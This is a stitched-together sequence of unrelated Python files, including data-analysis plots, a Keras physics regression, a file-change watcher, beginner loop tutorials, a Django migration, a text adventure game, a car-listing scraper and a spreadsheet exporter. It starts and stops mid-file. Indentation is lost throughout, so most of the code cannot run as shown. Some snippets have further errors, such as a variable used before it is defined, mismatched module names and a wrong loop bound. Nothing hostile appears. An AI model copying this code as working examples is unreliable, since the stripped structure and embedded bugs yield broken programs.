for ss in sample_sizes:
sample = data[0:ss]
p = pw.density_function(phi, sample)
# Evaluate the density funtion for values of x,
# using the zero-one window function.
print("Plotting density for a sample size of", ss)
y = np.array([p(xi) for xi in x])
plt.plot(x,y, label=str(ss))
plt.legend(fancybox=True, title="Sample Size", shadow=True)
plt.title(mytitle, fontsize=18)
plt.xlabel("x", fontsize=16)
plt.ylabel("p(x)", fontsize=16)
plt.show()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 30 15:48:13 2018
@author: brian
"""
import seaborn as sns
########Correlation Matrix
#Seaborn's heatmap version:
df3 = dfMaster
corr = df1.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
pd.set_option('display.max_columns', 25)
df1= dfMaster[[ u'Latitude', u'Longitude', u'month',
u'year', u'NDVI', u'EVI',
u'NDWI1',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
u'daysabove28', u'daysabove35', u'eto', u'zVPD', u'zP', u'zETO',
u'zSRAD', u'zETR', u'ztmmn', u'ztmmx', u'zcum_daysinarow_lowpr',
u'zdaysabove30']]
# u'NDWI2', u'NDVImean', u'NDVIstd', u'EVImean', u'EVIstd',
# u'NDWI1mean', u'NDWI2mean', u'NDWI1std', u'NDWI2std', u'zNDVI', u'zEVI',
corr = df1.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
df2= dfMaster[[ u'Latitude', u'Longitude',
u'NDVI',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
u'daysabove28', u'daysabove35', u'eto', u'zVPD', u'zP', u'zETO',
u'zSRAD', u'zETR', u'ztmmn', u'ztmmx', u'zcum_daysinarow_lowpr',
u'zdaysabove30']]
corr = df2.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
dfapril = dfMaster.loc[(dfMaster.month==4)]
dfapril= dfapril[[ u'Latitude', u'Longitude',
u'NDVI', 'EVI',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
u'daysabove28', u'daysabove35']]
dfapril = dfapril.loc[(dfapril.NDVI >.4)]
corr = dfapril.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
dfmay = dfMaster.loc[(dfMaster.month==5)]
dfmay= dfmay[[ u'Latitude', u'Longitude',
u'NDVI', 'EVI',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
u'daysabove28', u'daysabove35']]
corr = dfmay.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
dfmay = dfMaster.loc[(dfMaster.NDVI>.4)]
dfmay= dfmay[[ u'Latitude', u'Longitude',
u'NDVI', 'EVI', 'zNDVI',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
u'daysabove28', u'daysabove35']]
corr = dfmay.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
dfjulywinter= df[[
u'NDVI', 'EVI', 'zNDVI',
u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
u'cum_daysinarow_lowpr', u'pr','avgtemp',
u'daysabove28']]
corr = dfjulywinter.corr()
sns.heatmap(corr,
xticklabels=corr.columns.values,
yticklabels=corr.columns.values,
center=0, cmap='seismic')
|
# It turns out that 12 cm is the smallest length of wire that can be bent to form an integer sided right angle triangle in exactly one way, but there are many more examples.
# 12 cm: (3,4,5)
# 24 cm: (6,8,10)
# 30 cm: (5,12,13)
# 36 cm: (9,12,15)
# 40 cm: (8,15,17)
# 48 cm: (12,16,20)
# In contrast, some lengths of wire, like 20 cm, cannot be bent to form an integer sided right angle triangle, and other lengths allow more than one solution to be found; for example, using 120 cm it is possible to form exactly three different integer sided right angle triangles.
# 120 cm: (30,40,50), (20,48,52), (24,45,51)
# Given that L is the length of the wire, for how many values of L ≤ 1,500,000 can exactly one integer sided right angle triangle be formed?
############
# Solution #
############
# How many unique integer solutions to aa + bb == cc, where
# a < b < c?
L = 1200
lengths = [0] * L
ls = []
for l in range(L):
ls.append(l * l)
for i in range(L):
for j in range(i + 1, L):
for k in range(j + 1, L - i - j):
if ls[i] + ls[j] == ls[k]:
lengths[i + j + k] += 1
ans = 0
for i in range(len(lengths)):
if lengths[i] == 1:
ans += 1
print(ans) |
num=int(input("Enter the number"))
sum=0
for i in range(2,num+1):
sum=sum+(1/(i*i*i))
print("Sum of series is",sum) |
import numpy
import pandas
import ROOT
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn.cross_validation import cross_val_score
#from sklearn.model_selection import cross_val_score
from sklearn.cross_validation import KFold
#from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
myfile = ROOT.TFile("regditaumass.root","RECREATE")
#load dataset
dataframe_mass_train = pandas.read_csv("train_reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass_train = dataframe_mass_train.values
dataframe_mass_test= pandas.read_csv("test_reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass_test = dataframe_mass_test.values
dataframe_mass= pandas.read_csv("reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass = dataframe_mass.values
dataframe_mass_train_all = pandas.read_csv("train_reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_train_all = dataframe_mass_train_all.values
dataframe_mass_test_all= pandas.read_csv("test_reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_test_all = dataframe_mass_test_all.values
dataframe_mass_all= pandas.read_csv("reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_all = dataframe_mass_all.values
# split into input and output variables
train_input = dataset_mass_train[:,0:5]
train_output = dataset_mass_train[:,5]
test_input = dataset_mass_test[:,0:5]
test_output = dataset_mass_test[:,5]
mass_input = dataset_mass[:,:]
train_input_all = dataset_mass_train_all[:,0:5]
train_output_all = dataset_mass_train_all[:,5]
test_input_all = dataset_mass_test_all[:,0:5]
test_output_all = dataset_mass_test_all[:,5]
mass_input_all = dataset_mass_all[:,:]
#histogram of ditau mass with regression only hadronic decays
histditaumassreg = ROOT.TH1D("ditaumassreg","di-#tau mass using regression hadronic decays",100,0,100)
histditaumassreg.GetXaxis().SetTitle("di-#tau mass [GeV]")
histditaumassreg.GetYaxis().SetTitle("number of occurence")
#histogram of ditau mass with regression all particles
histditaumassregall = ROOT.TH1D("ditaumassregall","di-#tau mass using regression all decays",100,0,100)
histditaumassregall.GetXaxis().SetTitle("di-#tau mass [GeV]")
histditaumassregall.GetYaxis().SetTitle("number of occurence")
mass_model = Sequential()
mass_model.add(Dense(5,input_dim=5,kernel_initializer='normal',activation='relu'))
mass_model.add(Dense(1,kernel_initializer='normal'))
mass_model.compile(loss='mean_squared_error',optimizer='adam')
mass_model.fit(train_input,train_output,batch_size=5,epochs=100,verbose=0)
mass_score = mass_model.evaluate(test_input,test_output,verbose=0)
ditaumass = mass_model.predict(mass_input,batch_size=5,verbose=0)
mass_model_all = Sequential()
mass_model_all.add(Dense(5,input_dim=5,kernel_initializer='normal',activation='relu'))
mass_model_all.add(Dense(1,kernel_initializer='normal'))
mass_model_all.compile(loss='mean_squared_error',optimizer='adam')
mass_model_all.fit(train_input_all,train_output_all,batch_size=5,epochs=100,verbose=0)
mass_score_all = mass_model_all.evaluate(test_input_all,test_output_all,verbose=0)
ditaumass_all = mass_model_all.predict(mass_input_all,batch_size=5,verbose=0)
for i in ditaumass:
histditaumassreg.Fill(i)
for j in ditaumass_all:
histditaumassregall.Fill(j)
#histogram of di-tau mass using regression hadronic decays
canv1 = ROOT.TCanvas("di-tau mass using regression hadronic")
histditaumassreg.Draw()
histditaumassreg.Write()
img1 = ROOT.TImage.Create()
img1.FromPad(canv1)
img1.WriteImage("reg_ditau_mass_hadronic.png")
#histogram of di-tau mass using regression all decays
canv2 = ROOT.TCanvas("di-tau mass using regression all decays")
histditaumassregall.Draw()
histditaumassregall.Write()
img2 = ROOT.TImage.Create()
img2.FromPad(canv2)
img2.WriteImage("reg_ditau_mass_all.png")
myfile.Close()
|
import os
import time
import math
import proddog.changeset
import proddog.observer
observDirectory = '/var/local/www/hostname'
modifiedPeriod = 60*60*48
checkPeriod = 10*60
excludeExtensions = ['png', 'log']
observer = prodcontrol.observer.Observer(observDirectory, modifiedPeriod, excludeExtensions)
changeset = prodcontrol.changeset.Changeset('.changeset')
while True:
os.system('cls' if os.name=='nt' else 'clear')
print "-"*50
print "[{0}]: started check\n".format(time.asctime( time.localtime(time.time()) ))
modifiedFiles = observer.run()
changesetList = []
for modifiedFile in modifiedFiles:
# updating changeset file
if changeset.hasChange(modifiedFile['filePath'], modifiedFile['modTimestamp']):
continue
changeset.addChange(modifiedFile['filePath'], modifiedFile['modTimestamp'])
changesetList.append(modifiedFile)
if len(changesetList) <= 0:
print "\t No new changes found"
# output changeset
for modifiedFile in changesetList:
# converting modTime seconds to human-readable text
modificationTime = ''
modHours = 0
modMinutes = 0
if int(modifiedFile['modTime']) > 3600:
modHours = int(modifiedFile['modTime'] / 3600)
if int(modifiedFile['modTime']) - modHours*3600 > 60:
modMinutes = int((modifiedFile['modTime'] - modHours*3600) / 60)
if modHours > 0:
modificationTime += str(modHours) + "h "
if modMinutes > 0:
modificationTime += str(modMinutes) + "m "
if int(modifiedFile['modTime']) - modHours*3600 - modMinutes*60 > 0:
modificationTime += str(int(modifiedFile['modTime']) - modHours*3600 - modMinutes*60) + "s"
# / converted
print "\t[{0}]: {1} (-{2})".format(modifiedFile['changeType'], modifiedFile['filePath'], modificationTime)
print "\n[{0}]: done".format(time.asctime( time.localtime(time.time()) ))
time.sleep(checkPeriod)
|
#Python的循环有两种
#一种是for...in循环,依次把list或tuple中的每个元素迭代出来,看例子:
names = ['Michael', 'Bob', 'Tracy']
for name in names:
print(name)
#计算1-10的整数之和
sums = [1,2,3,4,5,6,7,8,9,10]
total = 0;
for sum in sums:
total +=sum;
pass;
print(total)
#如果要计算1-100的整数之和,从1写到100有点困难,
#幸好Python提供一个range()函数,可以生成一个整数序列,
#再通过list()函数可以转换为list。比如range(5)生成的序列是从0开始小于5的整数:
bugList = list(range(101));
total = 0 ;
for bigList in bugList:
total+=bigList
pass;
print(total)
#第二种循环是while循环,只要条件满足,就不断循环,条件不满足时退出循环。
#比如我们要计算100以内所有奇数之和,可以用while循环实现
sum = 0
n = 99
while n > 0:
sum = sum + n
n = n - 2
print(sum)
#用for
list2 = list(range(100))
top=100
total = 0
print(list2)
for list in list2:
if list%2!=0:
total +=list;
pass
print(total)
#break
#在循环中,break语句可以提前退出循环。例如,本来要循环打印1~100的数字:
n = 1;
while n<100:
if n==10:
break
n+=1;
print(n);
print('end')
#continue 打印所有的奇数
n = 0;
flg = True;
while n<100:
n+=1;
if n%2==0:
continue
print(n);
print('end')
|
from xml.dom import minidom
xmldoc = minidom.parse('4.xml')
reflist = xmldoc.getElementsByTagName('ref')
print reflist
print
print reflist[0].toxml()
print
print reflist[1].toxml()
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to run training and evaluation."""
import argparse
import os
import tensorflow as tf
from driblet.contrib.models.custom import input_functions
from driblet.contrib.models.custom import models
from driblet.contrib.models.custom.feature_transformer import utils
_FORWARD_FEATURES = 'forward_features'
_TARGET_FEATURE = 'target_feature'
_FEATURES_CONFIG_FILE = '/tmp/features_config.cfg'
def parse_arguments():
"""Initialize command line parser using arparse.
Returns:
An argparse.ArgumentParser.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--features_config_file',
default=None,
help='Path to features configuration file (.cfg)',
type=str)
# Flags related to input data.
parser.add_argument(
'--train_data',
default=None,
help='GCS or local paths to training data',
nargs='+',
type=str)
parser.add_argument(
'--eval_data',
default=None,
help='GCS or local paths to evaluation data',
nargs='+',
type=str)
parser.add_argument(
'--schema_file',
default=None,
help='File holding the schema for the input data',
type=str)
# Flags related to feature transformation.
parser.add_argument(
'--include_prediction_class',
default=False,
help='If set True, classification prediction output will include predicted classes.',
type=bool)
parser.add_argument(
'--probability_output_key',
default='probability',
help='Key name for output probability value.',
type=str)
parser.add_argument(
'--prediction_output_key',
default='prediction',
help='Key name for output prediction value.',
type=str)
# Flags related to model's output.
parser.add_argument(
'--transform_dir',
default=None,
help='Tf-transform directory with model from preprocessing step',
type=str)
# Flags related to training hyperparameters.
parser.add_argument(
'--job-dir',
default=None,
help='GCS location to write checkpoints and export models.',
type=str)
parser.add_argument(
'--model_name', default=None, help='Name of the model to save.', type=str)
parser.add_argument(
'--estimator_type',
default='Regressor',
help='Type of the estimator. Should be one of [Regressor, '
'CombinedRegressor, Classifier, CombinedClassifier].',
type=str)
parser.add_argument(
'--train_steps',
default=1000,
help='Count of steps to run the training job for',
type=int)
parser.add_argument(
'--train_batch_size', default=100, help='Train batch size.', type=int)
parser.add_argument(
'--eval_steps',
default=100,
help='Number of steps to run evaluation for at each checkpoint',
type=int)
parser.add_argument(
'--eval_batch_size', default=50, help='Eval batch size.', type=int)
parser.add_argument(
'--num_epochs', default=1, help='Number of epochs.', type=int)
parser.add_argument(
'--first_layer_size',
default=10,
help='Size of the first layer.',
type=int)
parser.add_argument(
'--num_layers', default=2, help='Number of NN layers.', type=int)
parser.add_argument(
'--save_checkpoints_steps',
default=100,
help='Save checkpoints every N steps.',
type=int)
parser.add_argument(
'--keep_checkpoint_max',
default=3,
help='Maximum number of recent checkpoint files to keep.',
type=int)
parser.add_argument(
'--exports_to_keep',
default=1,
help='Number of model exports to keep.',
type=int)
parser.add_argument(
'--start_delay_secs',
default=1,
help='Start evaluating after N seconds.',
type=int)
parser.add_argument(
'--throttle_secs', default=2, help='Evaluate every N seconds.', type=int)
parser.add_argument(
'--dnn_optimizer',
default='Adam',
help='Optimizer for DNN model.',
type=str)
parser.add_argument(
'--dnn_dropout', default=0.1, help='Dropout value for DNN.', type=float)
parser.add_argument(
'--linear_optimizer',
default='Ftrl',
help='Optimizer for linear model.',
type=str)
parser.add_argument(
'--learning_rate',
default=0.001,
help='Learning rate for the model.',
type=float)
return parser.parse_args()
def train_and_evaluate(hparams) -> None:
"""Trains and evaluates the model.
Args:
hparams: An instance of HParams object describing the hyper-parameters for
the model.
Raises:
RuntimeError: When features config file does not exist.
"""
config_path = hparams.features_config_file
if config_path.startswith('gs://'):
config_path = _FEATURES_CONFIG_FILE
tf.io.gfile.copy(hparams.features_config_file, config_path, overwrite=True)
if not os.path.isfile(config_path):
raise RuntimeError('Features config `{}` not exist.'.format(config_path))
features_config = utils.parse_features_config(config_path)
train_input_fn = input_functions.get_input_fn(
filename_patterns=hparams.train_data,
tf_transform_dir=hparams.transform_dir,
target_feature=features_config[_TARGET_FEATURE],
forward_features=features_config[_FORWARD_FEATURES],
num_epochs=hparams.num_epochs,
batch_size=hparams.train_batch_size)
train_spec = tf.estimator.TrainSpec(
input_fn=train_input_fn, max_steps=hparams.train_steps)
eval_input_fn = input_functions.get_input_fn(
filename_patterns=hparams.eval_data,
tf_transform_dir=hparams.transform_dir,
target_feature=features_config[_TARGET_FEATURE],
forward_features=features_config[_FORWARD_FEATURES],
num_epochs=hparams.num_epochs,
batch_size=hparams.eval_batch_size)
schema_file = utils.read_schema(hparams.schema_file)
raw_feature_spec = utils.get_raw_feature_spec(schema_file,
tf.estimator.ModeKeys.TRAIN)
serving_receiver_fn = lambda: input_functions.example_serving_receiver_fn(
hparams.transform_dir, raw_feature_spec, features_config[_TARGET_FEATURE],
features_config[_FORWARD_FEATURES])
exporter = tf.estimator.LatestExporter(
name=hparams.model_name,
serving_input_receiver_fn=serving_receiver_fn,
exports_to_keep=hparams.exports_to_keep)
eval_spec = tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=hparams.eval_steps,
start_delay_secs=hparams.start_delay_secs,
throttle_secs=hparams.throttle_secs,
exporters=[exporter])
estimator = models.create_estimator(
features_config=features_config,
job_dir=hparams.job_dir,
first_layer_size=hparams.first_layer_size,
num_layers=hparams.num_layers,
estimator_type=hparams.estimator_type,
linear_optimizer=hparams.linear_optimizer,
dnn_optimizer=hparams.dnn_optimizer,
dnn_dropout=hparams.dnn_dropout,
learning_rate=hparams.learning_rate,
save_checkpoints_steps=hparams.save_checkpoints_steps,
keep_checkpoint_max=hparams.keep_checkpoint_max,
include_prediction_class=hparams.include_prediction_class,
probability_output_key=hparams.probability_output_key,
prediction_output_key=hparams.prediction_output_key)
tf.estimator.train_and_evaluate(
estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
def main() -> None:
"""Main method to call train and evaluate."""
tf.get_logger().setLevel('ERROR')
args = parse_arguments()
train_and_evaluate(args)
if __name__ == '__main__':
main()
|
class Script:
@staticmethod
def main():
int_months_0 = 1
int_months_1 = 2
int_months_2 = 3
int_months_3 = 4
int_months_4 = 5
int_months_5 = 6
int_months_6 = 7
int_months_7 = 8
int_months_8 = 9
int_months_9 = 10
int_months_10 = 11
int_months_11 = 12
index_four = int_months_4
last_value = int_months_11
print(str(index_four))
print(str(last_value))
Script.main() |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-11 09:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('pjt_inventory', '0027_auto_20161011_1358'),
]
operations = [
migrations.AlterField(
model_name='subcategory',
name='child_category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='pjt_inventory.Category'),
),
]
|
# -*- coding: utf-8 -*-
"""
voicetools library
=====================
"""
__title__ = 'voicetools'
__version__ = '0.0.1'
__author__ = 'namco1992'
__license__ = 'Apache 2.0'
from voicetools.api import Wolfram, TuringRobot, BaiduVoice
from voicetools.clients import BaseClient
import voicetools.utils
from voicetools.exceptions import (
APIError, RespError, RecognitionError, VerifyError, QuotaError)
|
__author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
def __init__(self):
self.S = []
self.answer = []
self.total_answer = []
def is_a_solution(self,k):
return k == len(self.S)
def process_solution(self):
self.total_answer.append(''.join(self.answer))
def constact_candiates(self, k):
if self.S[k].isalpha():
if ord(self.S[k]) > 96:
return [self.S[k],chr(ord(self.S[k])-32)]
else:
return [chr(ord(self.S[k])+32),self.S[k]]
else:
return [self.S[k]]
def backtrack(self,k):
if self.is_a_solution(k):
self.process_solution()
else:
k = k + 1
candidates = self.constact_candiates(k-1)
for ch in candidates:
self.answer.append(ch)
self.backtrack(k)
self.answer.pop()
if k == len(self.answer):
return
def letterCasePermutation(self, S):
"""
:type S: str
:rtype: List[str]
"""
self.S = S
self.backtrack(0)
return self.total_answer
# 简单解法
# def letterCasePermutation(self, S):
# ans = [[]]
#
# for char in S:
# n = len(ans)
# if char.isalpha():
# for i in range(n):
# ans.append(ans[i][:])
# ans[i].append(char.lower())
# ans[n+i].append(char.upper())
# else:
# for i in range(n):
# ans[i].append(char)
# # temp = list(map("".join, ans))
# # print(temp)
# return list(map("".join, ans))
if __name__ == "__main__":
S = Solution()
print(S.letterCasePermutation("a1b2")) |
import pdb
from models.beer import Beer
from models.brewer import Brewer
import repositories.brewer_repository as brewer_repository
import repositories.beer_repository as beer_repository
brewer_repository.delete_all()
beer_repository.delete_all()
brewer1 = Brewer('Fallen Brewing',
"Unrefined, Vegan friendly beer from Glasgow. Made with 100% renewable energy.")
brewer_repository.save(brewer1)
brewer2 = Brewer('Harviestoun Brewery',
'Established brewery using ingredients from the Scottish Highlands.')
brewer_repository.save(brewer2)
beer1 = Beer("Chew Chew", "Sweet, chewy stout with sugar.",
"Stout", 15, 2.50, 3.10, "https://www.fallenbrewing.co.uk/wp-content/uploads/2020/08/ChewChew_440.png", brewer1)
beer_repository.save(beer1)
beer2 = Beer('Schiehallion', 'Crisp lager with refreshing notes.',
'Lager', 25, 1.90, 3.50, "https://harviestoun.com/wp-content/uploads/2019/07/HARVIE_BOTTLES_Schiehallion_V01_UPDATE-new.png", brewer2)
beer_repository.save(beer2)
beer3 = Beer('Bitter and Twisted', 'Sweet malt and bitter hops in one bottle. Full bodied light ale style with a punch.',
'Golden Ale', 10, 1.75, 3.00, "https://harviestoun.com/wp-content/uploads/2019/07/HARVIE_BitterNTwisted-new.png", brewer2)
beer_repository.save(beer3)
|
# Text-based adventure game - Viet Hoang Cao
def game_over():
print("I'm sorry that you were defeated while this game has not been completed yet so fingers cross for you next time")
game_over()
def treasure_room_1(): # alone
print("After all, this game has almost came to an end. However, it is not over yet. After entering the treasure room, a dragon is waiting for you.")
print("Similar to previous challenges, you have two options to defeat the dragon. 1). Kill it slowly with your bow and arrows or 2). Take full advantage of your special abilities")
choice_3 = int(input("Which option will you choose to defeat the final boss").strip())
if choice_3 == 1:
print("That is a great decision. You have defeated the cold-blooded dragon")
elif choice_3 == 2:
print("You have been defeated by the dragon. It is so strong that it is immune to your special abilities")
game_over()
def treasure_room_2(): # with polar hear
print("After all, this game has almost come to an end. However, it is not over yet. After entering the treasure room, a dragon is waiting for you.")
print("Similar to previous challenges, you have two options to defeat the dragon. 1). Kill it slowly with your bow and arrows and ask the polar bear for help or 2). Take full advantage of your special abilities")
choice_4 = int(input("Which option will you choose to defeat the final boss? ").strip())
if choice_4 == 1:
print("That is a great decision. You have defeated the final boss thanks to the polar bear and your special archery talent")
elif choice_4 == 2:
print("You have been defeated by the dragon. It is so strong that it is immune to your special abilities")
game_over()
def lion_room():
print("So you have entered the lion room. A lion is sleeping very well at the end of the room")
print("You have two options. 1). Walk past the lion silently and 2). Kill the lion")
choice_1 = int(input("Which option will you go for? 1 or 2").strip())
if choice_1 == 1:
print("Great choice. The lion can't notice you at all")
treasure_room_1()
elif choice_1 == 2:
print("That's bad luck. The lion has been very hungry over the last few days.")
game_over()
def tiger_room():
print("So you have entered the tiger room. A tiger is fighting with a polar bear right at the center of room")
print("Would you rather: 1). Run quickly across the room? and 2). Help the polar bear by shooting your bow to the tiger?")
choice_2 = int(input("Which option will you go for ? 1 or 2").strip())
if choice_2 == 1:
print("Unfortunately you attract both of them and they kill you.")
game_over()
elif choice_2 == 2:
print("That's an outstanding decision. The polar becomes your loyal companion until the end")
treasure_room_2()
def main_game():
print("You are standing in front of two rooms. One is the lion room and the other is the tiger room.")
room = input("Which door do you want to get inside? ").lower().strip()
if room == "lion room":
lion_room()
elif room == "tiger room":
tiger_room()
def start_game():
ready = input("Welcome to my text-based adventure game. Are you ready? ").title().strip()
if ready == "Yes":
print("I hope you will have an enjoyable time experiencing my text-based adventure game. Now, let's get the ball rolling. ")
main_game()
elif ready == "No":
print("Then just take your time to prepare. Don't worry ! ")
else:
print("Invalid input. You can only enter yes or no")
while True:
start_game()
replay = input("Would you want to try this game again?").lower().strip()
if replay == "yes":
continue
elif replay == "no":
print("Thank you very much for playing. See you next time ")
break |
#Connection persistence strategy adapted from @vincent31337, Stack Overflow:
#https://stackoverflow.com/questions/55523299/best-practices-for-persistent-database-connections-in-python-when-using-flask
from flaskr.db import MoviebuffDB
from flaskr.cosmos import MoviebuffCosmos
from flaskr.mongo import MongoDB
db = MoviebuffDB()
cosmos_db = MoviebuffCosmos()
mongo_db = MongoDB()
|
from django.conf.urls import patterns, url
from places import views
urlpatterns = patterns('',
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^(?P<pk>\d+)/$', views.PlaceDetailView.as_view(), name='place_detail'),
url(r'^creat_new_place/$', views.NewPlaceCreateView.as_view(), name='creat_new_place'),
) |
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
from time import sleep
import re
import json
import requests
import sys
import datetime
arguments = sys.argv
# - TODO --
# - add command line arguments to choose what call is being searched for
# - process data
# - averages for the year
# - graphs
# - do the work headless (don't open a browser window)
# r = requests.get('https://www.autotempest.com/results?make=lexus&model=gsf&zip=60004')
# data = r.json()
# print(json.dumps(data.popitem(), indent=2))
titles = []
years = []
prices = []
mileages = []
locations = []
links = []
make = ''
model = ''
zip = ''
trim = ''
# not enough arguments provided
if len(arguments) < 4:
make = 'lexus'
model = 'gsf'
zip = '60004'
else:
make = arguments[1].lower()
model = arguments[2].lower()
if len(arguments) == 4:
zip = arguments[3]
elif len(arguments) == 5:
trim = arguments[3]
zip = arguments[4]
else:
print(arguments)
date = datetime.datetime.now().strftime('%x')
driver = webdriver.Chrome('/usr/local/bin/chromedriver')
url = 'https://www.autotempest.com/results?make=' + make.lower() + '&model=' + model + '&zip=' + zip
# driver.get('https://www.autotempest.com/results?make=lexus&model=gsf&zip=60004')
driver.get(url)
sleep(5)
content = driver.page_source
# open the webpage
soup = BeautifulSoup(content, features="html.parser")
# wait for the webpage to load
sleep(5)
# pull the 'result-list-item' elements from the page
# 'result-list-item' is the common element among each posting in the page
results = soup.findAll('li', attrs={'class':'result-list-item'})
# regular expression for finding the model year
regex = re.compile(r"[0-9]{4}")
print('Found ', len(results), ' entries...')
# iterate through the results to extract information
for item in results:
description = item.find("span", class_="title-wrap")
# extract the title
title = description.find("a", class_="listing-link").text.strip()
# extract the year
match = re.search(regex, title)
year = str(match.group(0))
# add year and title to respective list
years.append(year)
titles.append(title.replace(year + ' ', ''))
# extract the price, if it doesn't exists, enter 'N/A' as a placeholder
try:
prices.append(item.find("div", class_="price").text.strip())
except:
prices.append("N/A")
# extract the mileage, if it doesn't exists, enter 'N/A' as a placeholder
try:
mileages.append(item.find("span", class_="info mileage").text)
except:
mileages.append("N/A")
locations.append(item.find("span", class_="location-info-wrap").text.strip())
links.append(item.find('a', href=True)['href'])
dates = [date]*len(results)
# display the extracted information
for k in range(0, len(results)):
print(dates[k], '\t', years[k], '\t', titles[k], '\t', prices[k], '\t', mileages[k], '\t', locations[k], '\t', links[k])
print("Num results: ", len(results))
# store the extracted information in a dataframe
df = pd.DataFrame({'Date': dates, 'Car': titles, 'Year': years, 'Price': prices, 'Mileage': mileages, 'Location': locations, 'URL': links})
csv_title = model + '_prices.csv'
df.to_csv(csv_title, mode='a', encoding='utf-8', index=False)
driver.close() |
"""add_project
Revision ID: c0acc1e1a1b5
Revises: 675cea0bd5a0
Create Date: 2019-09-25 11:16:04.135133
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'c0acc1e1a1b5'
down_revision = '675cea0bd5a0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('projects_project',
sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=False),
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=100), nullable=False),
sa.Column('slug', sa.String(length=100), nullable=False),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('projects_project')
# ### end Alembic commands ###
|
# encoding: utf-8
import xlrd
import sys
from sheet import shm
args = {}
def export_single_book():
file_path = args.input
output_path = args.output
shm.add_work_book(file_path)
sheet_name_list = shm.get_sheet_name_list()
for sheet_name in sheet_name_list:
if shm.is_ref_sheet(sheet_name):
continue
print('Exporting: %s' % sheet_name)
py = shm.get_sheet(sheet_name).to_python()
f = file(output_path + sheet_name + '.py', 'w')
f.write(str(py).encode('UTF-8'))
f.close()
json = shm.export_json(sheet_name)
f = file(output_path + sheet_name + '.json', 'w')
f.write(json.encode('UTF-8'))
f.close()
lua = shm.export_lua(sheet_name)
f = file(output_path + sheet_name + '.lua', 'w')
f.write(lua.encode('UTF-8'))
f.close()
def export_main_book():
file_path = args.input
output_path = args.output
wb = xlrd.open_workbook(file_path)
sh = wb.sheet_by_index(0)
workbook_path_list = []
sheet_list = []
for row in range(sh.nrows):
type = sh.cell(row, 0).value
if type == '__workbook__':
pass
else:
sheet_list.append([])
sheet = sheet_list[-1]
sheet.append(type)
for col in range(1, sh.ncols):
value = sh.cell(row, col).value
if type == '__workbook__' and value != '':
workbook_path_list.append(value)
elif value != '':
sheet.append(value)
for workbook_path in workbook_path_list:
shm.add_work_book(workbook_path + '.xlsx')
for sheet in sheet_list:
if '->' in sheet[0]:
sheet_name = sheet[0].split('->')[0]
sheet_output_name = sheet[0].split('->')[1]
else:
sheet_output_name = sheet_name = sheet[0]
sheet_output_field = sheet[1:]
# py = shm.get_sheet(sheet_name).to_python(sheet_output_field)
# f = file(output_path + sheet_name + '.py', 'w')
# f.write(str(py).encode('UTF-8'))
# f.close()
print('Exporting: %s -> %s' % (sheet_name, sheet_output_name))
json = shm.export_json(sheet_name, sheet_output_field)
f = file(output_path + sheet_name + '.json', 'w')
f.write(json.encode('UTF-8'))
f.close()
lua = shm.export_lua(sheet_name, sheet_output_field)
f = file(output_path + sheet_name + '.lua', 'w')
